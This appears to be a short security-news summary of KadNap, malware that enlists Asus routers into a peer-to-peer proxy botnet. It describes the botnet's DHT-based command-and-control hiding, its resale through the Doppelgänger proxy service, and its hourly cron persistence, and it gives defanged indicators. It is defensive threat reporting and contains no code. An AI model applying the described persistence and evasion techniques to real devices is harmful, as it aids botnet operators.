"KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts."
"Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger ("doppelganger[.]shop"), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide "100% anonymity.""
"Central to the attack is a shell script ("aic.sh") that's downloaded from the C2 server ("212.104.141[.]140"), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to ".asusrouter," and run it."
KadNap is a newly discovered malware first detected in August 2025 that primarily targets Asus routers to recruit them into a botnet for proxying malicious traffic. The malware has infected over 14,000 devices, with more than 60% located in the U.S. and additional infections across Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. KadNap employs a custom version of the Kademlia Distributed Hash Table protocol to conceal infrastructure within a peer-to-peer system, evading traditional network monitoring. Compromised devices are marketed through a proxy service called Doppelgänger, assessed as a rebrand of the Faceless proxy service linked to TheMoon malware. The attack uses a shell script downloaded from a command-and-control server that establishes persistence through cron jobs.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]